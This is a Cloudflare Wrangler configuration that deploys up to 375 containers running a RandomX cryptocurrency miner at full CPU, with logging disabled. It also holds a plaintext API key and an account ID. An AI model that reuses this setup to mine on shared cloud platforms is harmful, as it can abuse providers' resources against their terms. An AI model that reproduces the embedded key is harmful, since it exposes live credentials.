{
	"$schema": "./node_modules/wrangler/config-schema.json",
	"name": "v5base00",
	"main": "src/index.ts",
	"compatibility_date": "2026-04-20",
	"compatibility_flags": ["nodejs_compat"],
	"account_id": "e2c572e12b3730aab98f3e06226fe619",
	"workers_dev": true,
	"preview_urls": false,
	"triggers": {
		"crons": ["*/1 * * * *"]
	},
	"limits": {
		"cpu_ms": 300000,
		"subrequests": 10000
	},
	"observability": {
		"enabled": false
	},
	"placement": {
		"mode": "targeted",
		"hostname": "v5base00.fragrant-cake-f995.workers.dev"
	},
	"vars": {
		"SANDBOX_TRANSPORT": "rpc",
		"API_KEY": "m9jeXyoL12OKSGqIoCwauEoPS6I31YNm9jCWohvLXsWQ2ipn",
		"REPORTER_ENDPOINT": "https://v5base00.fragrant-cake-f995.workers.dev/instances/heartbeat",
		"MINER_THREADS": "4",
		"MINER_CPU_PRIORITY": "5",
		"MINER_CPU_AFFINITY": "container",
		"MINER_RANDOMX_MODE": "fast",
		"MINER_RANDOMX_1GB_PAGES": "true",
		"MINER_RANDOMX_WRMSR": "false",
		"MINER_RANDOMX_CACHE_QOS": "true",
		"MINER_RANDOMX_INIT": "-1",
		"MINER_HUGE_PAGES_JIT": "true",
		"MINER_CPU_MEMORY_POOL": "-1",
		"MINER_CPU_MAX_THREADS_HINT": "100",
		"MINER_MAX_CPU_USAGE": "100",
		"MINER_DONATE_LEVEL": "0",
		"MINER_PRINT_TIME": "300"
	},
	"containers": [
		{
			"class_name": "MinerSandbox",
			"name": "miner-container",
			"image": "./Dockerfile",
			"instance_type": {
				"vcpu": 4,
				"memory_mib": 12288,
				"disk_mb": 20000
			},
			"max_instances": 375,
			"rollout_active_grace_period": 900,
			"rollout_step_percentage": 5,
			"constraints": {
				"regions": [
					"EEUR",
					"WEUR"
				],
				"jurisdiction": "eu"
			}
		}
	],
	"durable_objects": {
		"bindings": [
			{
				"name": "MINER_COORDINATOR",
				"class_name": "MinerCoordinator"
			},
			{
				"name": "MINER_CONTAINER",
				"class_name": "MinerSandbox"
			}
		]
	},
	"d1_databases": [
		{
			"binding": "DB",
			"database_name": "miner-metrics",
			"database_id": "1b150a3b-2b6c-4516-96d8-8b5b28515adb"
		}
	],
	"analytics_engine_datasets": [
		{
			"binding": "HEARTBEATS",
			"dataset": "miner_heartbeats"
		}
	],
	"migrations": [
		{
			"tag": "v1",
			"new_sqlite_classes": ["MinerCoordinator", "MinerSandbox"]
		}
	]
}
